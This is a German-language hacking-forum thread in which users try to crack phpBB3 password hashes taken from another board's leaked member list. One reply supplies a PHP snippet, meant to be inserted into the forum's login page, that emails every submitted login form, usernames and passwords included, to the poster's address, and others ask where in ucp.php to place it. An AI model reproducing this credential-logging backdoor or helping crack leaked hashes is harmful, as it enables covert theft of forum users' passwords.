Ich kann nur MD5 cracken aber sowas : $H$7LdHwE9wB.J5YvgSUZqklqwFENMroH/ nicht

kann mir wer den cracken?

ich glaub das ist sha1.

und dafür hab ich keinen crax0r, sry ^^

Würde helfen wenn du sagen könntest woher du den hast ?


phpbb3 ?

Erlich gesagt weiß ich es nicht da ich selbst nur eine html seite bekommen habe von nem Board (dort stehen nur namen und verschlüsselte pws) ein paar md5 und ein paar für mich nicht definierbare (siehe oben:?)

Edit:

ich glaub das ist sha1.

und dafür hab ich keinen crax0r, sry ^^

hat sha1 nicht 40 Zeichen? Der, den ich habe hat nur 29 wenn ich mich nicht verzählt habe

das sind 34, da hast du dich ganz schön verzählt, aber ich kenne auch kaum eine verschlüsselung, die im resultat sonderzeichen enthält, ausser DES. Vllt guckst du da mal nach...

$H <- salt

$7LdHwE9wB.J5YvgSUZqklqwFENMroH <- hash

/ ( / = abschluss )

hm versteh ich nicht, daraus kann ich nicht erschließen was das für ein Hash ist

das ist ein hash aus phpbb3, ich habe diese hashs auch in meinem Forum und bin auch dran interessiert diese zu knacken, ist das denn möglich?

ich bin auf 32 zeichen beim zählen gekommen....

Added after 5 minutes:

von der art her sieht er aus wie ein MD5 (Unix)(29)[vllt auch MD5(APR)(26)], Hat aber die länge von nem MD5(HMAC)(32)... kp, find ich komisch^^

Added after 11 minutes:

ich bin zu blöde zum zählen(ich komm immer bei was anderem raus^^), aber der mit 26 zeichen isses auf jeden mal nicht! Also ich würde sagen entweder MD5(HMAC) oder MD5(APR)... so und mehr hab ich dazu nichtmehr zu melden...^^

mfg mario 0.o

// edit: phpBB3 kann auch sein aber möglichkeiten zum cracken sind mir keine bekannt... sry

der is wohl aus einer phpbb3 datenbank:
meiner hier sieht genauso aus:
$H$9tkb/nbUn0wiRMPKoB.pNhhmd2egEQ0

das komische is, dass nicht alle pws die sonderzeichen drin haben. ein paar sind auch ganz einfach md5 hashs, die sich wunderbar knacken lassen.

welche zeichen müssen bei obigem code raus um einen normalen hash zu haben, skilled?
siehe auch hier: http://free-hack.com/viewtopic.php?t=62340

www.phpBBhacks.com

schaut mal hier nach, glaub aber nich das da was wirklich hilfreiches kommt...

//edit: hier gibts leider nur sachen für phpBB2

phpbbhacks hat leider überhaupt nix mit wirklichem pw hacks zu tun...da gibts nur templates usw.

http://www.free-hack.com/viewtopic.php?t=58719&highlight=
http://www.free-hack.com/viewtopic.php?t=58387&highlight=

$passwort = crypt(md5($passwort), $salt);
Hinweis: Es existiert keine decrypt Funktion, da crypt() eine Einweg-Verschlüsselung ist. Ich schätze mal, dass PHPBB je nach Länge des Passworts salted. Mir ist noch kein großer Unterschied aufgefallen zwischen Usern die gesaltete Hashs haben und denen die normale MD5s haben...

Und wenn ihr die Passwörter aus euren eigenen Foren haben wollt, dann geht das bei Gottes Willen auch einfacher... Indem ihr die PWs sofort im Klartext bei jedem Login in eine Datei schreibt.

Und wenn ihr die Passwörter aus euren eigenen Foren haben wollt, dann geht das bei Gottes Willen auch einfacher... Indem ihr die PWs sofort im Klartext bei jedem Login in eine Datei schreibt.

wie kann ich das abändern, dass es auch in ne datei geschrieben wird?

Indem du in etwa sowas in die Login-Seite einbaust:

<?

//Checken ob Post Daten enthällt
if(!empty($_POST))
//Wenn ja, dann eine Mail an deine@mail.com senden mit dem kompletten Postarray
mail('deine@mail.com'', 'Geloggte Benutzerdaten', 'Follgender Post-String wurde geloggt: '.implode('&', $_POST));

?>

Statt Mail lassen sich natürlich auch Text-DBs oder normale DBs verwenden um Daten zu speichern...

Zur Info: Der crypt() Befehl ist ein DES-Fingerprint

<?

//Checken ob Post Daten enthällt
if(!empty($_POST))
//Wenn ja, dann eine Mail an deine@mail.com senden mit dem kompletten Postarray
mail('deine@mail.com'', 'Geloggte Benutzerdaten', 'Follgender Post-String wurde geloggt: '.implode('&', $_POST));

?>

kennt sich jemand mit phpbb aus um mir sagen zu können wo dieser code rein muss?

kann es sein dass es die "ucp.php" ist?? die wird nämlich aufgerufen, wenn man auf anmelden klickt.

und and welche stelle in der datei kommt der code hin. wenn ich ihn einfach nur ans ende hänge kann man sich nicht mehr einloggen!!!

Added after 116 hours:

kann mir jemand helfen...finds einfach nicht raus :(